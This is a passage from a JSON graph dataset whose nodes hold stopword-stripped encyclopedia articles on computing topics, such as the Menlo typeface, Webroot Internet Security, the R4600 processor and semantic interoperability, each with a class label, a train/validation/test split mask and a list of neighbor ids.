      2023,
      10224,
      6129,
      6130,
      2039
    ],
    "mask": "None"
  },
  {
    "node_id": 8701,
    "label": 2,
    "text": "Menlo_(typeface):menlo typeface menlo monospaced sans-serif typeface designed jim lyles face first shipped mac os x snow leopard menlo based upon open source font bitstream vera public domain font deja vu menlo replaced system monospaced font mac os 10.11 new apple-made monospaced font called sf mono monospaced variant san francisco family fonts apple created part corporate identity installed user-accessible typeface default although included used xcode even installed user sf mono license agreement extraordinarily restrictive limits use font solely conjunction apple-branded applications allowed embedded anywhere use typeface requires written consent apple mac os 10.12.4 user still install use sf mono unless copied resources folder apple however begun use apple developer website version used slightly newer one ships mac os",
    "neighbors": [
      10432,
      2978,
      7171,
      166,
      1191,
      4141,
      10478,
      9912,
      1435
    ],
    "mask": "Test"
  },
  {
    "node_id": 8702,
    "label": 7,
    "text": "DRMAA:drmaa drmaa distributed resource management application api high-level open grid forum api specification submission control jobs distributed resource management drm system cluster grid computing infrastructure scope api covers high level functionality required applications submit control monitor jobs execution resources drm system 2007 drmaa one first two one gridrpc specifications reached full recommendation status open grid forum 2012 second version drmaa standard drmaa2 published abstract interface definition language idl defining semantic functions gfd 194 drmaa2 specifies twice many calls drmaa covers cluster monitoring notion queues machines introduces multi job-session concept single applications better job workflow management later 2012 c api specified first language binding gf 198 development api done global grid forum model ietf standard development originally co-authored specification first proposed global grid forum 3 ggf3 frascati italy gained momentum global grid forum 4 toronto ontario development specification first proposed objective facilitate direct interfacing applications existing drm systems application builders portal builders independent software vendors isvs api co-authored participants wide-selection companies included participants industries education development resulted open standard received relatively good reception wide audience quickly without drmaa standard model existed submit jobs component regions grid assuming region running local drmss first version drmaa api implemented sun grid engine also university wisconsin–madison program condor furthermore c java idl binding documents made available language bindings generated easily swig first used perl binding number software solutions use drmaa interface different resource management systems",
    "neighbors": [
      10625,
      9602,
      3462,
      8582,
      2710,
      7318,
      1435,
      5414,
      5677,
      2481,
      692,
      9665,
      5956,
      9301,
      11353,
      2651,
      8030,
      10597,
      8554,
      3323,
      2045,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 8703,
    "label": 4,
    "text": "Webroot_Internet_Security_Complete:webroot internet security complete webroot internet security complete computer security software program microsoft windows users combine saas cloud protection traditional antivirus antispyware desktop technologies built suite two-way firewall 10gb online backup file sharing capabilities registry cleaner email antispam secure browsing anti-phishing password management service suite initially released july 26 2010 2011 version product product received many positive comments reviewers intuitive easy-to-use interface initial reviews product praised program solid core feature set including real-time protection shields firewall automatically filters network traffic according pre-selected profiles browsing protection provides ratings links search results reviews also praise extensive features set identity privacy protection updated easy-to-use user interface additional reviews commended ‘ sync share ’ features namely file synchronization sharing abilities well added benefit integrated password management tools product said reviewers “ noisy firewall ” regular pop-ups requiring user ’ action criticisms also include comments limited capacity antispam component compatibility microsoft outlook outlook express limits number consumers utilize feature program heavily criticized including parental controls feature set commonly included security suites type competitors webroot internet security complete comes feature set webroot internet security essentials additional personal privacy protection features including password management tool 8gb additional online storage space credit card monitoring/ identity theft prevention service us based customers password management tool licensed lastpass designed store login information usernames passwords well personal information used common forms name birth date user name address email address phone number credit card details bank account information secure encrypted online portal master password used gain access stored information access gained using webroot toolbar visiting saved site logging webroot account user ’ using another password-management application import data application webroot software using either webroot portal webroot toolbar additional identity features us customers include identity theft protection monitoring services trustedid comes fraud alerts free annual credit reports also 1,000,000 service warranty covers lost wages out-of-pocket expenses legal defense fees occur result identity theft pc magazine tests product ’ malware detection rates found blocked 90 undeniable spam blocked .8 legitimate emails suite overall malware detection rate 83 giving total score 7.0 10 detected 100 rootkits 93 keyloggers 89 scareware suite overall malware blocking rate 91 overall score 9.0 10 detected 100 commercial keyloggers rootkits 89 blocking rate scareware secure browsing feature software blocked total 84 harmful urls webroot mistakenly flagged core windows system files malicious even started temporarily removing legit files trashing user computers around world software installed tests pc mag found 18 increase total system boot time 19 increase load time web pages antispam component turned load time email retrieval slowed 2.7 times br copying moving large collection files disks webroot added 1 total task time task zipping unzipping large group files took 24 longer webroot installed without installing uninstalling number large windows installer packages increased task time adding 35 webroot software installed another review system impact measured based two components using pcmark first overall system performance measured reported ad less 3 overall impact performance well time took perform full system scan reported taking one hour scan hard drive containing 140gb data software received international computer security association certification desktop/server anti-virus detection anti-virus cleaning windows 32 64 bit webroot internet security complete received virus bulletin december 2010 antivirus certification windows 7 uk review site awarded product “ reviews recommended ” award reviewing product feature set price received 2011 bronze award software review site toptenreviews computeractive gave “ buy ” rating 5 5 star review",
    "neighbors": [
      2213,
      8998,
      6797,
      3342,
      7983,
      2257,
      9713,
      467,
      6516,
      8724,
      3320,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 8704,
    "label": 3,
    "text": "Burton_Smith:burton smith burton j. smith march 21 1941 – april 2 2018 american computer architect technical fellow microsoft smith graduated cate school carpinteria california 1958 established gifted math science student taking special interest chemistry placed third statewide competition senior smith went pomona college claremont california study physics transferred pomona university new mexico following freshman year still unhappy education subsequently dropped college entirely join navy smith spent four years military returning university new mexico changing studies physics electrical engineering graduating summa cum laude b.s.e.e degree 1967 smith turned acceptances berkeley stanford attend massachusetts institute technology pursue doctorate citing financial aid package reasoning behind decision part aid package work-study asking smith help build database university computer science department one smith first formative experiences computers earned sc.d mit 1972 1970 1979 taught massachusetts institute technology university colorado smith spent six years denelcor inc. colorado serving vice president research development primary architect denelcor heterogeneous element processor hep 1985 1988 smith fellow institute defense analyses supercomputing research center smith co-founded tera computer company 1988 2005 served chief scientist member board directors also company chairman 1988 1999 2000 tera acquired cray research business unit silicon graphics renamed cray inc.. december 2005 smith hired microsoft technical fellow working various groups within company define expand efforts areas parallel high-performance computing smith received 1991 eckert-mauchly award institute electrical electronics engineers ieee association computing machinery 2003 received seymour cray computer science engineering award ieee computer society elected national academy engineering received ieee computer society charles babbage award elected fellow american academy arts sciences 2010 smith died april 2 2018 regional hospital highline medical center burien washington survived two daughters julia katherine ray granddaughter erin brother david burton ’ wife dorothy preceded death dennis shasha minds springer new york 1998. interview burton smith",
    "neighbors": [
      11697,
      10051,
      9932
    ],
    "mask": "None"
  },
  {
    "node_id": 8705,
    "label": 0,
    "text": "Probabilistic_latent_semantic_analysis:probabilistic latent semantic analysis probabilistic latent semantic analysis plsa also known probabilistic latent semantic indexing plsi especially information retrieval circles statistical technique analysis two-mode co-occurrence data effect one derive low-dimensional representation observed variables terms affinity certain hidden variables latent semantic analysis plsa evolved compared standard latent semantic analysis stems linear algebra downsizes occurrence tables usually via singular value decomposition probabilistic latent semantic analysis based mixture decomposition derived latent class model considering observations form co-occurrences formula_1 words documents plsa models probability co-occurrence mixture conditionally independent multinomial distributions c words topic note number topics hyperparameter must chosen advance estimated data first formulation symmetric formulation formula_3 formula_4 generated latent class formula_5 similar ways using conditional probabilities formula_6 formula_7 whereas second formulation asymmetric formulation document formula_4 latent class chosen conditionally document according formula_9 word generated class according formula_7 although used words documents example co-occurrence couple discrete variables may modelled exactly way number parameters equal formula_11 number parameters grows linearly number documents addition although plsa generative model documents collection estimated generative model new documents parameters learned using em algorithm plsa may used discriminative setting via fisher kernels plsa applications information retrieval filtering natural language processing machine learning text related areas reported aspect model used probabilistic latent semantic analysis severe overfitting problems example latent class model see references therein related non-negative matrix factorization present terminology coined 1999 thomas hofmann",
    "neighbors": [
      4072,
      7780
    ],
    "mask": "None"
  },
  {
    "node_id": 8706,
    "label": 5,
    "text": "MimbleWimble:mimblewimble mimblewimble blockchain protocol created improve privacy fungibility scalability blockchains published july 19 2016 pseudonym tom elvis jedusor french name voldemort harry potter mimblewimble protocol cleverly uses blinding factors balancing inputs outputs commitment scheme private keys sender receiver must interact construct joint signature authorize transfer funds blocks mimblewimble constituent transactions aggregated one giant transaction erasing original transaction boundaries initial block download benefits cut-through spent outputs cancel corresponding inputs erasing blockchain history provable security analysis mimblewimble provided georg fuchsbauer et al protocol powers several decentralized privacy-oriented cryptocurrencies",
    "neighbors": [
      9248,
      3713,
      9859,
      1908,
      8916,
      7802,
      4827,
      11612,
      1087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8707,
    "label": 3,
    "text": "Hardcard:hardcard hardcard genericized trademark hard disk drive disk controller host adapter expansion card personal computer typically hard disk drive hdd installs drive bay cables connect drive host adapter power source personal computer lacks available bus compatible host adapter one may install adapter expansion slot hardcard supplies host adapter n't require empty drive bay plus development subsidiary quantum corporation developed first isa hardcard released october 1985 june 1986 28 plus development competitors producing similar products term used generically refer hard disk card quantum corporation formed plus development subsidiary 1983 plus development invested efforts developing hard disk drive average computer owner could install easily without much technical knowledge 1985 plus development engineered first hardcard 10 megabyte mb capacity suggested retail price 1,095 mid-1980s hard drives small 1.6 inches tall order fit single isa pc card expansion slot custom one-inch thick hard drive designed spent 15 million project plus development started shipping hardcard october 1985 trademarked hardcard brand 1988 hardcard provided computer industry first one-inch-thick hdd interface form factor compatible full length card slot isa bus first introduced ibm pc thicker head disk assembly subsequently introduced 1-inch high standard form factor 3½-inch hdds sources inside company launch hardcard claim first hdd controller integrated drive printed circuit board xebec hdd controller manufacturer early 1980s already done owl product around august 1984 complete 5.25 inch half-height hdd integrated controller drive electronics printed circuit board sasi interface introduction hardcard plus development continued working higher capacity hard drives form factor first hardcard brand name became widely known name continued follow products hardcard ii hardcard ii xl advertised effective access times result disk cache hardcard ii listed times hardcard ii xl listed effective access time hardcard ez line returned listing access times without benefit cache hardcard products including hardcard ii xl produced plus development name hardcard ez released quantum name quantum absorbed wholly owned subsidiary plus development within one year plus development introduction hardcard 28 companies released similar products time products using standard hard drive 1.6-inch height forcing card hang adjacent pc slot hard drive located opposite side away connector sometimes enabling short half-length expansion card installed adjacent slot hard drive cards usually described occupying 1.5 expansion slots companies product names similar product plus hardcard 1985 tandy introduced tandy 1000 tandy offered proprietary 20 megabyte hard card 799 8-bit isa slot required accommodate hard card preserving drive bays disk drives cd-roms 8-bit slots electronically compatible computer could hold card 10 1/2 inches long result many hard cards offered plus development 13 inches long hence compatible hard cards certified tandy compatible meaning fit tandy 1000 model sx tx sl tl series possible use plus development hard card tandy 1000 completely removing plastic case cutting metal frame allow fit hard card must 10 inches long use 8-bit isa interface work tandy 1000 computer usually card must installed slot 1 due overhang tandy 1000 60 watt power supply n't sufficient run hard cards power-efficient card preferable",
    "neighbors": [
      5368,
      2159
    ],
    "mask": "Test"
  },
  {
    "node_id": 8708,
    "label": 5,
    "text": "Point_coordination_function:point coordination function point coordination function pcf media access control mac technique used ieee 802.11 based wlans including wi-fi resides point coordinator also known access point ap coordinate communication within network ap waits pifs duration rather difs duration grasp channel pifs less difs duration hence point coordinator always priority access channel pcf located directly distributed coordination function dcf ieee 802.11 mac architecture channel access pcf mode centralized hence point coordinator sends cf-poll frame pcf capable station permit transmit frame case polled station frames send must transmit null frame due priority pcf dcf stations use dcf might gain access medium prevent repetition interval designed cover contention free pcf contention based dcf traffic repetition interval repeated continuously starts special control frame called beacon frame stations hear beacon frame start network allocation vector duration contention free period repetition period since aps logical bus topologies shared circuits one message processed one time contention based system thus media access control technique required wireless networks may suffer hidden node problem regular nodes communicate ap see nodes extreme edge geographical radius network wireless signal attenuates reach far thus ap middle allows distance halved allowing nodes see ap consequentially halving maximum distance two nodes extreme edges circle-star topology pcf seems implemented hardware devices part wi-fi alliance interoperability standard pcf interframe space pifs one interframe space used ieee 802.11 based wireless lans pcf enabled access point wait pifs duration rather difs occupy wireless medium pifs duration less difs greater sifs difs pifs sifs hence ap always priority access medium pifs duration calculated follows pifs sifs slot time",
    "neighbors": [
      10112,
      2306,
      388,
      3847,
      7049,
      656,
      5270,
      11288,
      2458,
      5020,
      5671,
      1192,
      11560,
      6187,
      4396,
      7723,
      11181,
      434,
      3762,
      11321,
      5439,
      7490,
      3780,
      9284,
      5321,
      7498,
      2911,
      2785,
      5092,
      4581,
      5863,
      2802,
      4339,
      11125,
      6904,
      8828
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8709,
    "label": 3,
    "text": "The_Legend_of_Kage:legend kage player armed kodachi shortsword unlimited number shuriken main gameplay revolves around killing enemy ninja blue red enemy fire-breathing monks five stages home versions grabbing crystal ball causes player clothes change next level color thereby attain certain powers bigger shuriken faster speed kage hit home version green orange clothes die reverts normal red clothes player takes role young iga ninja named kage shadow mission rescue princess kiri hime shogun daughter villainous warlord yoshi ro kuyigusa fellow evil samurai yuki nosuke riko kage must fight way forest along secret passageway fortress wall castle ... rescuing twice three times fc/nes version order win game time princess rescued seasons change summer fall winter back summer famicom/nes version re-released wii virtual console japan december 19 2006 united states february 19 2007 also released 3ds virtual console wii u virtual console japan arcade version also appears compilation title taito legends 2 revised legend kage included taito nostalgia 1 release along original game features two new playable characters ayame ganin ayame ninja throw bombs similar red ninja game unlimited supply throwing knives ganin dog breathe fire similar monks game perform spin attack much range leaves invulnerable instant kills enemy touches also new final boss characters face giant green cobra slithers ground back forth screen end second run levels enemy jump air 3d graphics remake arcade game along original arcade version included 2006 compilation taito legends power playstation portable game still side-scrolling follow-up game developed lancarse nintendo ds published taito 2008 taito parent company square enix published north american localization game later year",
    "neighbors": [
      4043,
      8492,
      9006,
      4690,
      6390,
      9501,
      5275,
      1693,
      4894
    ],
    "mask": "Train"
  },
  {
    "node_id": 8710,
    "label": 6,
    "text": "SyMon_Bootmanager:symon bootmanager symon bootmanager light-weighted partitions bootmanager developed wholly assembler code thus needs little space installation software makes possible create 36 partitions one single hard drive 20 operating systems organized partitions despite small size bootmanager pseudo graphical interface equipped many powerful features features make unique among bootmanagers utility developed vladimir dashevsky free current version r3.23.02",
    "neighbors": [
      4309,
      2811,
      477,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 8711,
    "label": 3,
    "text": "R4600:r4600 r4600 code-named orion microprocessor developed quantum effect design qed implemented mips iii instruction set architecture isa qed design firm fabricate sell designs r4600 first licensed integrated device technology idt later toshiba nkk companies fabricated microprocessor marketed r4600 designed low-end workstation high-end embedded microprocessor users included silicon graphics inc. sgi indy workstation deskstation technology windows nt workstations r4600 instrumental making indy successful providing good integer performance competitive price embedded systems prominent users included cisco systems network routers canon printers idt first company fabricate ship r4600 idt produced first silicon august 1993 first part 100 mhz part announced october 1993 march 1994 cebit idt announced 133 mhz part fabricated 0.65 μm cmos process required 5 v power supply nkk announced version r4600 nr4600 middle 1994 first nr4600 100 mhz part fabricated 0.5 μm process used 3.3 v power supply r4600 simple design scalar processor issuing one instruction per cycle integer pipeline floating-point unit fpu integer instructions single cycle latency throughput except multiplies divides multiplies 32-bit 64-bit eight-cycle latency six-cycle throughput divides 32-cycle latency throughput 32-bit integers 61-cycle latency throughput 64-bit integers fpu pipelined save die area thus cost characteristic severely restricted r4600 floating-point performance impede success low-end computers embedded applications integer performance important single double precision adds four-cycle latency throughput single double precision multiplies partially pipelined eight-cycle latency six-cycle throughput single precision divides 32-cycle latency throughput whereas double precision division 61-cycle latency throughput square roots latency throughput one cycle less comparative divide instructions r4600 uses floating-point unit perform floating-point multiply divide also integer multiply divide r4600 16 kb two-way set-associative caches instructions data supported l2 cache on-die hardware control requiring external logic whether custom application specific integrated circuit asic chipset cache cache resided sysad bus shared external interface sysad bus 64 bits wide operate clock rates 50 mhz peak bandwidth 400 mb/s r4600 external interface support multiprocessing r4600 needs supplied three clock signals generate various clocks r4650 derivative r4600 announced 19 october 1994 custom instructions improving performance fixed-point digital signal processing dsp applications lower cost version r4650 r4640 announced 27 november 1995 32-bit instead 64-bit external interface 16 september 1997 150 180 mhz versions microprocessors introduced quantities 10,000 150 180 mhz r4640s priced 30 39 respectively 150 180 mhz r4650s priced 60 74 respectively r4650 also available 133 167 mhz speeds used arcade games produced namco example time crisis 2 running namco system 23 hardware r4640 used webtv networks webtv plus thin client r4700 also code-named orion derivative r4600 ported 0.5 µm cmos process r4700 available 100 133 150 175 200 mhz versions",
    "neighbors": [
      4098,
      8327,
      8711,
      783,
      8976,
      7445,
      2071,
      9851,
      4124,
      8481,
      5028,
      6057,
      938,
      426,
      8237,
      6834,
      1461,
      7234,
      10051,
      1480,
      10316,
      6247,
      7911,
      10601,
      6250,
      6252,
      6253,
      5358,
      10734,
      6256,
      5235,
      5237,
      760,
      3451,
      11007
    ],
    "mask": "Test"
  },
  {
    "node_id": 8712,
    "label": 9,
    "text": "Binary_recompiler:binary recompiler binary recompiler compiler takes executable binary files input analyzes structure applies transformations optimizations outputs new optimized executable binaries binary recompilation introduced gary kildall 1980s",
    "neighbors": [
      1952,
      4112,
      4548,
      7941
    ],
    "mask": "Test"
  },
  {
    "node_id": 8713,
    "label": 2,
    "text": "PTS-DOS:pts-dos pts-dos aka pts/dos disk operating system dos clone developed russia phystechsoft paragon technology systems phystechsoft formed 1991 moscow russia graduates members mipt informally known phystech end 1993 phystechsoft released first commercially available pts-dos pts-dos v6.4 version numbering followed ms-dos version numbers microsoft released ms-dos 6.2 november 1993 1995 programmers left phystechsoft founded paragon technology systems took source code released version named pts/dos 6.51cd well s/dos 1.0 source dos stripped open-source version according official phystechsoft announcements programmers violated copyright laws russian military laws pts-dos developed close relationship russia military thus may subject military secrets law phystechsoft continued development released pts-dos v6.6 somewhere presented pts-dos v6.65 cebit exhibition 1997 next version phystechsoft formally pts/dos extended version 6.70 labeled pts-dos 2000 still distributed last 16-bit pts-dos system paragon continued pts-dos line released paragon dos pro 2000 also known labeled places pts/dos pro 2000 according paragon last version development since ceased moreover release contained bundled source code older pts-dos v6.51 later phystechsoft continued developing pts-dos finally released pts-dos 32 formally known pts-dos v7.0 added support fat32 file system pts-dos certified russian ministry defense following list commands supported pts-dos 2000 pro",
    "neighbors": [
      1408,
      2179,
      11145,
      7823,
      5267,
      8729,
      9762,
      10156,
      7983,
      7224,
      3129,
      7483,
      7356,
      1853,
      8517,
      4039,
      9166,
      4076,
      8301,
      5359,
      2545,
      5363,
      2933
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8714,
    "label": 3,
    "text": "Continua_Health_Alliance:continua health alliance continua health alliance international non-profit open industry group nearly 240 healthcare providers communications medical fitness device companies continua health alliance members aim develop system deliver personal individual healthcare continua founding member personal connected health alliance launched february 2014 founding members mhealth summit himss continua health alliance international not-for-profit industry organization enabling end-to-end plug-and-play connectivity devices services personal health management healthcare delivery mission empower information-driven health management facilitate incorporation health wellness day-to-day lives consumers continua pioneer establishing industry standards security connected health technologies smart phones gateways remote monitoring devices activities include certification brand support program events collaborations support technology clinical innovation well outreach employers payers governments care providers nearly 220 member companies reaching across globe continua comprises technology medical device healthcare industry leaders service providers dedicated making personal connected health reality continua health alliance working toward establishing systems interoperable telehealth devices services three major categories chronic disease management aging independently health physical fitness continua health alliance version 1 design guidelines based proven connectivity technical standards include bluetooth wireless usb wired device connection group released guidelines public june 2009 group establishing product certification program using recognizable logo continua certified logo program signifying product interoperable continua-certified products products made continua health alliance guidelines provide consumers increased assurance interoperability devices enabling easily share information caregivers service providers collaborations government agencies regulatory bodies continua works provide guidelines effective management diverse products services global network vendors continua health alliance products make use iso/ieee 11073 personal health data phd standards continua design guidelines available public without signing non-disclosure agreement continua guidelines help technology developers build end-to-end plug-and-play systems efficiently cost effectively continua health alliance founded june 6 2006 continua health alliance performed first public demonstration interoperability october 27 2008 partners center connected health 5th annual connected health symposium boston continua health alliance certified first product nonin 2500 palmsat handheld pulse oximeter usb january 26 2009 end december 2014 100 certified products continua selected bluetooth low energy zigbee wireless protocols wireless standards version 2 design guidelines released bluetooth low energy used low-power mobile devices zigbee used networked low-power sensors enabling independent living beginning 2012 continua invites non-members request copy design guidelines signing non-disclosure agreement continua working groups operations u.s. eu japan india china continua health alliance currently nearly 220 member companies continua board directors currently composed following companies organisation primarily staffed volunteers member organisations organised working groups address goals alliance board directors sit following main working groups continua alliance website contains full listing member organisations directory qualified products clear statement mission",
    "neighbors": [
      9137,
      11267,
      9863
    ],
    "mask": "Test"
  },
  {
    "node_id": 8715,
    "label": 3,
    "text": "Illegal_opcode:illegal opcode illegal opcode also called undocumented instruction instruction cpu mentioned official documentation released cpu designer manufacturer nevertheless effect illegal opcodes common older cpus designed 1970s mos technology 6502 intel 8086 zilog z80 older processors many exist side effect wiring transistors cpu usually combine functions cpu intended combined old modern processors also instructions intentionally included processor manufacturer documented official specification accidental illegal instructions useless even highly undesirable effects crashing computer might accident something useful certain situations instructions sometimes exploited computer games 1970s 1980s speed certain time-critical sections another common use ongoing battle copy protection implementations cracking form security obscurity secrecy usually last long danger associated use illegal instructions given fact manufacturer guarantee existence function might disappear behave differently change cpu internals new revision cpu rendering programs use incompatible newer revisions example number older apple ii games work correctly newer apple iic latter uses newer cpu revision 65c02 away illegal opcodes recent cpus 80186 80286 68000 descendants powerpc processor illegal opcodes widely known/used manufacturers guarantee cpu behave well-defined way finds unknown opcode instruction stream usually means triggering certain exception fault condition operating system exception fault handler usually terminate application caused fault another less common way handling illegal instructions defining nothing except taking time space equivalent cpu official nop instruction method used tms9900 65c02 processor among others spite manufacturer guarantee instructions research uncovered vast number undocumented instructions modern x86 processors instructions shared across processor manufacturers indicating intel amd aware instruction purpose despite appearing official specification instructions specific manufacturers specific product lines purpose majority x86 undocumented instructions unknown today details instructions mainly interest exact emulation older systems",
    "neighbors": [
      6921,
      8716,
      10786,
      10796,
      7983,
      9525,
      10442,
      8143,
      730,
      7269,
      5862,
      107,
      5358,
      5744,
      7281,
      372,
      7284,
      1915,
      8700,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8716,
    "label": 3,
    "text": "Indirect_branch:indirect branch indirect branch also known computed jump indirect jump register-indirect jump type program control instruction present machine language instruction sets rather specifying address next instruction execute direct branch argument specifies address located example 'jump indirect r1 register means next instruction executed address register r1 address jumped known instruction executed indirect branches also depend value memory location indirect branch useful make conditional branch especially multiway branch instance based program input value could looked jump table pointers code handling various cases implied data value data value could added address table result stored register indirect jump could made based value register efficiently dispatching program control code appropriate input similar manner subroutine call instructions indirect address subroutine called specified memory function pointers typically implemented indirect subroutine calls gcc-8.1 appear following new options codice_1",
    "neighbors": [
      7941,
      8715,
      6924,
      5523,
      10786,
      8231,
      10796,
      9911,
      7234,
      8143,
      6739,
      730,
      9964,
      5358,
      7281,
      499,
      372,
      1399,
      3323,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 8717,
    "label": 3,
    "text": "Semantic_interoperability:semantic interoperability semantic interoperability ability computer systems exchange data unambiguous shared meaning semantic interoperability requirement enable machine computable logic inferencing knowledge discovery data federation information systems semantic interoperability therefore concerned packaging data syntax simultaneous transmission meaning data semantics accomplished adding data data metadata linking data element controlled shared vocabulary meaning data transmitted data one self-describing information package independent information system shared vocabulary associated links ontology provides foundation capability machine interpretation inference logic syntactic interoperability prerequisite semantic interoperability syntactic interoperability refers packaging transmission mechanisms data healthcare hl7 use thirty years predates internet web technology uses pipe character data delimiter current internet standard document markup xml uses data delimiter data delimiters convey meaning data structure data without data dictionary translate contents delimiters data remains meaningless many attempts creating data dictionaries information models associate data packaging mechanisms none practical implement perpetuated ongoing babelization data inability exchange data meaning since introduction semantic web concept tim berners-lee 1999 growing interest application w3c world wide web consortium w3c standards provide web-scale semantic data exchange federation inferencing capabilities syntactic interoperability provided instance xml sql standards pre-requisite semantic involves common data format common protocol structure data manner processing information interpretable structure also allows detection syntactic errors thus allowing receiving systems request resending message appears garbled incomplete semantic communication possible syntax garbled unable represent data however information represented one syntax may cases accurately translated different syntax accurate translation syntaxes possible systems using different syntaxes may also interoperate accurately cases ability accurately translate information among systems using different syntaxes may limited one direction formalisms used different levels expressivity ability express information single ontology containing representations every term used every application generally considered impossible rapid creation new terms assignments new meanings old terms however though impossible anticipate every concept user may wish represent computer possibility finding finite set primitive concept representations combined create specific concepts users may need given set applications ontologies foundation ontology also called upper ontology contains primitive elements would provide sound basis general semantic interoperability allow users define new terms need using basic inventory ontology elements still newly defined terms properly interpreted computer system interpret basic foundation ontology whether number primitive concept representations fact finite expand indefinitely question active investigation finite stable foundation ontology suitable support accurate general semantic interoperability evolve initial foundation ontology tested used wide variety users present time foundation ontology adopted wide community stable foundation ontology still future one persistent misunderstanding recurs discussion semantics confusion words meanings meanings words change sometimes rapidly formal language used ontology encode meanings semantics concepts form change order determine meaning particular word term database example necessary label fixed concept representation ontology word term may refer concept multiple words refer fixed concept language called synonymy one word used refer one concept called ambiguity ambiguity synonymy among factors make computer understanding language difficult use words refer concepts meanings words used sensitive context purpose use many human-readable terms use ontologies supporting semantic interoperability provide fixed set concepts whose meanings relations stable agreed users task determining terms contexts database different context separated task creating ontology must taken designer database designer form data entry developer program language understanding word used interoperability context changes meaning preserve interoperability necessary change pointer ontology element specifies meaning word knowledge representation language may sufficiently expressive describe nuances meaning well understood fields least five levels complexity general semi-structured data one may use general purpose language xml languages full power first-order predicate logic may required many tasks human languages highly expressive considered ambiguous allow accurate interpretation desired given current level human language technology semantic interoperability may distinguished forms interoperability considering whether information transferred communicated form meaning required receiving system interpret correctly even algorithms used receiving system unknown sending system consider sending one number number intended sum money owed one company another implies action lack action part send receive may correctly interpreted sent response specific request received time form expected correct interpretation depend number could represent almost millions types quantitative measurement rather depends strictly circumstances transmission interpretation depends systems expecting algorithms system use number exactly sense depends entire envelope transmissions preceded actual transmission bare number contrast transmitting system know information used systems necessary shared agreement information specific meaning many possible meanings appear communication particular task one solution standardize form request payment request would encode standardized fashion information needed evaluate agent owing money agent owed money nature action giving rise debt agents goods services participants action time action amount owed currency debt reckoned time allowed payment form payment demanded information two systems agreed interpret information request achieve semantic interoperability specific type transaction semantic interoperability generally necessary provide standardized ways describe meanings many things commercial transactions number concepts whose representation needs agreed upon minimum several thousand achieve semantic interoperability restricted scenarios currently matter research discussion problem general semantic interoperability form foundation ontology 'upper ontology required sufficiently comprehensive provide defining concepts specialized ontologies multiple domains past decade ten foundation ontologies developed none yet adopted wide user base need single comprehensive all-inclusive ontology support semantic interoperability avoided designing common foundation ontology set basic primitive concepts combined create logical descriptions meanings terms used local domain ontologies local databases tactic based principle therefore tactic limits need prior agreement meanings ontology elements common foundation ontology fo based several considerations likely fewer 10,000 elements types relations practice together fo focused representations primitive concepts set domain extension ontologies fo elements specified using fo elements likely also used pre-existing extensions ease cost creating domain ontologies providing existing elements intended meaning reduce chance error using elements already tested domain extension ontologies may logically inconsistent needs determined different domain extensions used communication whether use single foundation ontology avoided sophisticated mapping techniques among independently developed ontologies also investigation practical significance semantic interoperability measured several studies estimate cost lost efficiency due lack semantic interoperability one study focusing lost efficiency communication healthcare information estimated us 77.8 billion per year could saved implementing effective interoperability standard area studies construction industry automobile manufacturing supply chain estimate costs us 10 billion per year due lack semantic interoperability industries total numbers extrapolated indicate well us 100 billion per year lost lack widely used semantic interoperability standard us alone yet study policy field might offer big cost savings applying semantic interoperability standards see policy fields capable profiting semantic interoperability see 'interoperability general policy fields egovernment health security many eu also set semantic interoperability centre europe june 2007",
    "neighbors": [
      10465,
      2948,
      5700,
      2377,
      4557,
      10413,
      10452,
      2901,
      10102,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 8718,
    "label": 8,
    "text": "Frontera_(web_crawling):frontera web crawling frontera open-source web crawling framework implementing crawl frontier component providing scalability primitives web crawler applications content structure world wide web changes rapidly frontera designed able adapt quickly changes large scale web crawlers operate batch mode sequential phases injection fetching parsing deduplication scheduling leads delay updating crawl web changes design mostly motivated relatively low random access performance hard disks compared sequential access frontera instead relies modern key value storage systems using efficient data structures powerful hardware crawling parsing schedule indexing new links concurrently open-source project designed fit various use cases high flexibility configurability large-scale web crawls frontera purpose flexibility allows crawls moderate size single machine cores leveraging single process distributed spiders run modes frontera written mainly python data transport formats well abstracted out-of-box implementations include support messagepack json kafka zeromq although frontera n't web crawler requires streaming crawling architecture rather batch crawling approach stormcrawler another stream-oriented crawler built top apache storm whilst using components apache nutch ecosystem scrapy cluster designed istresearch precise monitoring management queue mind systems provide fetching and/or queueing mechanisms link database content processing scrapinghub ltd. crawler processing 1600 requests per second peak built using primarily frontera using kafka message bus hbase storage link states link database crawler operates cycles cycle takes 1.5 months results 1.7b downloaded pages crawl spanish internet resulted 46.5m pages 1.5 months aws cluster 2 spider machines first version frontera operated single process part custom scheduler scrapy using on-disk sqlite database store link states queue able crawl days getting noticeable volume links started spend time select queries making crawl inefficient time frontera developed darpa memex program included catalog open source projects 2015 subsequent versions frontera used hbase storing link database queue application distributed two parts backend fetcher backend responsible communicating hbase means kafka fetcher reading kafka topic urls crawl producing crawl results another topic consumed backend thus creating closed cycle first priority queue prototype suitable web scale crawling implemented time queue producing batches limits number hosts requests per host next significant milestone frontera development introduction crawling strategy strategy worker along abstraction message bus became possible code custom crawling strategy without dealing low-level backend code operating queue easy way say links scheduled priority made frontera truly crawl frontier framework kafka quite heavy requirement small crawlers message bus abstraction allowed integrate almost messaging system frontera",
    "neighbors": [
      1280,
      9320,
      5546,
      8554,
      10250,
      6701,
      7983,
      113,
      119,
      823,
      4031
    ],
    "mask": "Test"
  },
  {
    "node_id": 8719,
    "label": 2,
